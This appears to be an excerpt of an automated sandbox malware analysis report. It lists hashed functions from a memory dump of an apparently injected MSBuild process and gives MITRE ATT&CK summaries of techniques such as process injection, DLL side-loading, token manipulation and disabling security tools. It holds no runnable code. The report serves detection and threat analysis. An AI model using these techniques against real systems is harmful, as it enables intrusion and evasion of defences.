Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f65ab16079d400d5c3b698f1f2e57afd31608189fc8d5de5c84999c4e87051e9
Instruction ID: a8a08a79dac9d58318e93541962d11c80442da5acf81bb4f3dc67ae1c5f324dc
Opcode Fuzzy Hash: f65ab16079d400d5c3b698f1f2e57afd31608189fc8d5de5c84999c4e87051e9
Instruction Fuzzy Hash: BEF08275E04219DB4F54EBB868512EE7BE5FB88254710013BD649E3301FB388D05CBD1

Function 02D7B7D8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaad84363feea12a369026d5f7dee2d608c3b4649a4b930881d094db909e9f5c
Instruction ID: 8416e6ad101c315104151dc2d0b6ad0d5d700e34677d0c11e9b3388a45b7764a
Opcode Fuzzy Hash: aaad84363feea12a369026d5f7dee2d608c3b4649a4b930881d094db909e9f5c
Instruction Fuzzy Hash: 1BF08275E402198F4F55EBB868516EE7BE5FB88254714013BDA59E3301FB348D018BD1

Function 02D7E2D1 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cee79c6b14d29d23ca1e9a5259a5282340ed6938e606c7e14e206f4edd06559
Instruction ID: 9fed97a7b1c82cc67342e5c828d0e3bcce43a80d54c717ead0de65f39e92fee9
Opcode Fuzzy Hash: 7cee79c6b14d29d23ca1e9a5259a5282340ed6938e606c7e14e206f4edd06559
Instruction Fuzzy Hash: E1F0BEB1E002199F8F50EFA9E9916EEB7F5FB88210B20016AD549E7305FB319D00CBE0

Function 02D7B140 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aac37f866291eccfc9505060a5c0eb061e879c4557101e3baa22a449353a84
Instruction ID: d049f5da0df299113f75c6c65817c86a6770fb8faff6ca615a637a73086c601e
Opcode Fuzzy Hash: f4aac37f866291eccfc9505060a5c0eb061e879c4557101e3baa22a449353a84
Instruction Fuzzy Hash: 66F017B5E042099F8B54EFA8A9852EEBBF4FB88314B10047AD909F3304F7349D00CBA1

Function 02D7B7DC Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abb97e5000bffb06ba0d3c93db5d549998e60b6366b8e9dee82b44af73029e84
Instruction ID: 6b7cab37df266dcda2ee9fe1206511713cae437a7620d6022acbc4610db43ff3
Opcode Fuzzy Hash: abb97e5000bffb06ba0d3c93db5d549998e60b6366b8e9dee82b44af73029e84
Instruction Fuzzy Hash: 37F082B5E002198B4F50EBB86C512EE7BE5EB88214710012ADA49E3301FB3489028BD1

Function 02D774B9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d428d771166ee859b75e5aea02a22d9046a389eb137f4f7de6774f25f8ce382
Instruction ID: 847f212e85922b2fc625ae1b656ebddb1fd47b4350ea97deb7c93e57672a501a
Opcode Fuzzy Hash: 7d428d771166ee859b75e5aea02a22d9046a389eb137f4f7de6774f25f8ce382
Instruction Fuzzy Hash: 4DF09674505295EFC705EF39D850AAEBBF6EF85610B1042E4E005CB225EB35AD01DF51

Function 02D7B554 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9b4d72558a3855e4260ecc5e3cbec42c4cb96510d6503d4a38a996ddff513ba
Instruction ID: 68bf4feb42daacf9d235284320ab0582fcfeb79467c4cd418f90937b2c409ac4
Opcode Fuzzy Hash: f9b4d72558a3855e4260ecc5e3cbec42c4cb96510d6503d4a38a996ddff513ba
Instruction Fuzzy Hash: 96F09075E042199B8F44DBA8A4822EEBBF4EF48314B10002BD509F3300FB388954CB94

Function 02D7B144 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713be894fd4730c5cf09049cfbdbeb1b5505f32857a5ff0606a8792905450b66
Instruction ID: 7261e88c8542c1c60ab3613945604877eed1e914074cb18861a42837a9606043
Opcode Fuzzy Hash: 713be894fd4730c5cf09049cfbdbeb1b5505f32857a5ff0606a8792905450b66
Instruction Fuzzy Hash: ECF017B5E002099F8B54EFA8A9856EEBBF4FB88214B10042AD509F3344E7359D008BA0

Function 02D7B55C Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd0802a36ef8bf1b12f272ddc8dc5348a96ee49a8b54071d26b780af9bdece4a
Instruction ID: 68c79c71c7d0272d676f2fa848c6d41779afbe033a8894eff410a4c9bbe28f30
Opcode Fuzzy Hash: cd0802a36ef8bf1b12f272ddc8dc5348a96ee49a8b54071d26b780af9bdece4a
Instruction Fuzzy Hash: 36F05EB5E002199F8F54EBA9A8862EE7BF4EB48224B10052BD509F3300FB3499558B95

Function 02D7AEC4 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfef1c4bb4844372a215a1d220954ae4616f698e60e9c108c79fd1f50e48cb02
Instruction ID: 7a58b16591e51d85ddea13df8b3caab78ad758982654fb40d101c61054141a70
Opcode Fuzzy Hash: cfef1c4bb4844372a215a1d220954ae4616f698e60e9c108c79fd1f50e48cb02
Instruction Fuzzy Hash: 2BF082B9E102199F8B54DFE8E9851EEBBF4FB48215B10003AE519E3304EB314D04CB91

Function 02D7AEC0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a32658788fdafaf1577f59e0db636861bbf4990b9cdc1d990289aab0260e612d
Instruction ID: f64f67482a520bff9c37e1d1eab71db7773184429a75bfe12a5e57f01cbb3f20
Opcode Fuzzy Hash: a32658788fdafaf1577f59e0db636861bbf4990b9cdc1d990289aab0260e612d
Instruction Fuzzy Hash: E7F05EB9E042199F8B54DFA8A9851EEBBF4FB48215B10003AE509E3304EB358E05CB91

Function 02D77460 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a5057e3ca5e8fd23526ddba6e2c8bac473bef3cf97a30afdb6362dd9661d83
Instruction ID: ddc81b2c642e31608fae407975cec205c988c170c211f0a287ab55ee36811f17
Opcode Fuzzy Hash: 31a5057e3ca5e8fd23526ddba6e2c8bac473bef3cf97a30afdb6362dd9661d83
Instruction Fuzzy Hash: ACE092327044318BD7456279641017D7BCAD785B997100467DA05CB748FE1BDD4187D6

Function 02D77539 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b718ee615402f0664f4b952fad4f920b4b1324cd2c256948d0843eb42d201c22
Instruction ID: 13210caba03d97a6313da408a1bc2f45367f841bd889f0a389dceee20f2f23ca
Opcode Fuzzy Hash: b718ee615402f0664f4b952fad4f920b4b1324cd2c256948d0843eb42d201c22
Instruction Fuzzy Hash: BBE0202A301355179944231D205027FB3CFCBC65217100417D405D7740FD1DDC06C7F1

Function 02D7AEC8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18a1406048b90db04ed96ad3d50298895551624619ad049d7cc15c38dca7a545
Instruction ID: 5e3f8817c43188a060d52d6ea6ccc723416e8c1555341f06ecc29e9464c3f994
Opcode Fuzzy Hash: 18a1406048b90db04ed96ad3d50298895551624619ad049d7cc15c38dca7a545
Instruction Fuzzy Hash: 50F082B5E042199F8B54EFA9E8855DEBBF4FB48214B10003AE509E3300EB315D04CBA1

Function 02D77590 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d83ab3eb412a123e78feaec2c4bba46114e1aa0d719f62b52e79d00f93210008
Instruction ID: f6be7b49bef095be5be0090ca41d528b71770752f02e19c41f941682c42962b9
Opcode Fuzzy Hash: d83ab3eb412a123e78feaec2c4bba46114e1aa0d719f62b52e79d00f93210008
Instruction Fuzzy Hash: 4BF05E35A002059FDB40FF69E48067DBBE5AB44204F0046B9D815D7748FB319D44CB51

Function 02D774C8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e219f35257da735aeef8392f95e5fb6dfc5802d4f89deb75888c9a63c5a3e12e
Instruction ID: 2b7dcf5d60c5f02d13e157b4deb3fc4ca44c9fd46be61b5a6e8c07ea1ffe4e79
Opcode Fuzzy Hash: e219f35257da735aeef8392f95e5fb6dfc5802d4f89deb75888c9a63c5a3e12e
Instruction Fuzzy Hash: 67F01274601255EFCB44FF69E840A5EB7FAFF84A10B1046A4E505CB219EB356D109F91

Function 02D71E10 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9a7b695c768db93cd76aa9d4003d590a8f29ac60efeb52417688fe83340c35
Instruction ID: c339211e9e45f2bc04cb3b2b4069a3f4a10db019845543cf1ec34debc98b48b2
Opcode Fuzzy Hash: 2f9a7b695c768db93cd76aa9d4003d590a8f29ac60efeb52417688fe83340c35
Instruction Fuzzy Hash: 8FF05E34910315EFCF42FFB9E84099D77B5BF80A11B904BA4D4048B628FF716E098B91

Function 02D780B1 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de0492343df7906c5a20b0e531d15a5abfb50b60e7a3dfb865b3d08705458680
Instruction ID: 8378c797319639df0a726a296bbbf2d364f804d32444325b20022ec26f7ba064
Opcode Fuzzy Hash: de0492343df7906c5a20b0e531d15a5abfb50b60e7a3dfb865b3d08705458680
Instruction Fuzzy Hash: B8F0F834B50216CBCB48FBA0E46D5AE7772EB84340B108915E9069B394DF39AC12DF81

Function 02D77594 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e76f2f5beac9c2a6005e92458bce921f7a6dabfb02a5e3d0d094dd5e113e50
Instruction ID: fede8b9ba7e41281c608f2c99057d223ebaf1a5f505236e4114ad28cae39de5f
Opcode Fuzzy Hash: f8e76f2f5beac9c2a6005e92458bce921f7a6dabfb02a5e3d0d094dd5e113e50
Instruction Fuzzy Hash: 36F01C34A002559FDB44FF6AE48166D7BB5BB44204F0046B9DC29DB748FB319D50CB92

Function 02D709D5 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 434d5263f982c2357cd9a880f3ec839d84a530c795c30fd16bad6158f5652dd2
Instruction ID: 704fc9e29a1cc732851c11f8af813bcb05b41e02feba4619848b30172ef5ef88
Opcode Fuzzy Hash: 434d5263f982c2357cd9a880f3ec839d84a530c795c30fd16bad6158f5652dd2
Instruction Fuzzy Hash: 35E09270118281DEF7291365A82832C7EA1ABA1617F4C1066D4D280BCEDF18CC81C327

Function 02D71718 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53fe093f5f5e22a94cd2db08ae525f6a5fb8ef572993ac00a9c33bbda5d7912c
Instruction ID: 1f8b1bcd746e844512c84394440c0d45b6beccf9b6d7b22f17eebcd7662c92c7
Opcode Fuzzy Hash: 53fe093f5f5e22a94cd2db08ae525f6a5fb8ef572993ac00a9c33bbda5d7912c
Instruction Fuzzy Hash: 62E0C2323001108FC3489A3EA88485BBBDEEFCA56031504B9F109C7312CEA1CC015B90

Function 02D77545 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d6041a0bd19ceacfd0fd58bdb942e4e89c6392bb09a325138316ad92cd389f9
Instruction ID: 92bbd423bb531b397fcd36aeab65ded3a5d3fa34e6d9274d5d6540450a1e3e8a
Opcode Fuzzy Hash: 0d6041a0bd19ceacfd0fd58bdb942e4e89c6392bb09a325138316ad92cd389f9
Instruction Fuzzy Hash: A0E02B39701225071A5C315E205027F12CBCFC6662724002AE809EB780FE2DDC0347F1

Function 02D77548 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52eefa757ed4bec599365abd0d4554c90ebbc7dceb273a73e2a7e5b92d869e08
Instruction ID: 729a47b24e38b644b3d6ae582725c467b21bd8bfec246b5835f15ef1dc81e042
Opcode Fuzzy Hash: 52eefa757ed4bec599365abd0d4554c90ebbc7dceb273a73e2a7e5b92d869e08
Instruction Fuzzy Hash: F6D02B25301325130958315E201023F62CFCFC6672710002AE409EB780EE6DEC0347F1

Function 02D7746C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04c1fbc964f39e563cc9f5c0fe706b53889fe6db392065d2424df3302ae2184e
Instruction ID: 28ac3e03d172481332c66a43371dd6c5bf5068b153a166607b8f60e00c95d538
Opcode Fuzzy Hash: 04c1fbc964f39e563cc9f5c0fe706b53889fe6db392065d2424df3302ae2184e
Instruction Fuzzy Hash: 77E08C307004318BCB047679A01026E76CADBC8B94B00016AEA09CB388EF6ADD4147D6

Function 02D72EE0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d051257ef5bb54ef0f6f48514d7cd772420f4e87b4694d8c972d8f19a6405e
Instruction ID: b583860189aaffce27b5d011af15eae57f61fa5e4c22ce39e2629b9c59ca5198
Opcode Fuzzy Hash: 89d051257ef5bb54ef0f6f48514d7cd772420f4e87b4694d8c972d8f19a6405e
Instruction Fuzzy Hash: E1E0DF3190828AEFCB80DFB4DD840EDBBE4EB55210700019EE808E7301E7315E14CB92

Function 02D72EEC Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a95328f7dd02e6c0457abb2fe857b6de84a039c5f6a836b00d1afaf02f1c1fe
Instruction ID: 8b0925c34b849d991453be233904ae565cf90793582dba8e48efaa8cedf48553
Opcode Fuzzy Hash: 1a95328f7dd02e6c0457abb2fe857b6de84a039c5f6a836b00d1afaf02f1c1fe
Instruction Fuzzy Hash: 4FE0127090130DFF8F84DFA5EA8059EB7F5EB45504B1041A9E408E7300EB326E149B91

Function 02D72EF0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37158aea3563527f631a3e26a14612e942c8460de90463d8228feb7bbf8fd2b7
Instruction ID: 994eecdad68de11656104741d6618c55acf6d75da88ee24f6a5c93d946a557fd
Opcode Fuzzy Hash: 37158aea3563527f631a3e26a14612e942c8460de90463d8228feb7bbf8fd2b7
Instruction Fuzzy Hash: D0D01770A0120DFF8B84EFA9EA8059EB7F9EB84604B1041A9E408E7200EB312E109B91

Function 02D780E4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95064983a95d7ed6d68e79ecdaf22f87a972374367b0c58707dfccbf6ba5d329
Instruction ID: b77dffaa3dbeab7b51c69a1aec23b9331770d84d487c0b6bc50160acdcd94ef9
Opcode Fuzzy Hash: 95064983a95d7ed6d68e79ecdaf22f87a972374367b0c58707dfccbf6ba5d329
Instruction Fuzzy Hash: 9DD05E35B002158BCB08AA64A4592DD3362EB84340F104410E9059B384DB245D229B82

Function 02D775E6 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b9a984d3a3313850953a7e3181154d9a99430ab4a211a61df9b4cc2deaf1047
Instruction ID: a6c17d3b0e88757e0af49f422350f94d3c516882d7c9a2f460fa0e5301ac983a
Opcode Fuzzy Hash: 2b9a984d3a3313850953a7e3181154d9a99430ab4a211a61df9b4cc2deaf1047
Instruction Fuzzy Hash: 57C012352042159FD615FF56F8819283755BBC160530006B8F815CB748FF115C60CB26

Function 02D70986 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93f12af9cafc88b7e6dc13c5daab404f590095864212d74fad28365ce86f34a8
Instruction ID: 8ce76ae4a9e8ae6ee9326aa842f57bda0aba5bc6327ed71151337d0e8efc75a4
Opcode Fuzzy Hash: 93f12af9cafc88b7e6dc13c5daab404f590095864212d74fad28365ce86f34a8
Instruction Fuzzy Hash: E1C08C7081828ADFFB285764D81C32CBE12A7D0203F0C0035E0E200BC89F2C8C84C71B

Function 02D709A2 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a63d945eb43f7a3e0acd7efd8623ce9163dc2a2a6ff298137a8901303d54b26
Instruction ID: ff24ff645ba2f21f5fb69a855b079b9149042dadd5d4c37d8e6e3548bab0fd26
Opcode Fuzzy Hash: 7a63d945eb43f7a3e0acd7efd8623ce9163dc2a2a6ff298137a8901303d54b26
Instruction Fuzzy Hash: 68C08C70808286DFF72867A4D81C32CBF11AB90302F0C0030E8E2007C8AF2C8C84C31B

Function 02D78940 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26c602af879f18f044e0644d1fc4670b2162b83c9e6809fc6d10290d608afbe2
Instruction ID: d97ea8e78b0417d209650a9f9743af3a0dd1418587c2c62e44848be98c8f2b5f
Opcode Fuzzy Hash: 26c602af879f18f044e0644d1fc4670b2162b83c9e6809fc6d10290d608afbe2
Instruction Fuzzy Hash: 32B01206C1C1C006C663A0310F9F2E9BF25F45251079C10C61989C0326FF4CDC07762B

Function 02D7894C Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2617483000.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d70000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8576634c36cfa39141af7dc9c364f2efb0bd1843a5c3993d9d5a3f7ffb4aad2
Instruction ID: 8ba5cb568e82cb925c3d146b4b2776c748af6a7f3c7ab94ccbfa79b9293a4741
Opcode Fuzzy Hash: d8576634c36cfa39141af7dc9c364f2efb0bd1843a5c3993d9d5a3f7ffb4aad2
Instruction Fuzzy Hash: C2A02232808C8802CC08F8C0C883ACC2320F320F003C80C2CC800C3B80C32CC0838A80

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
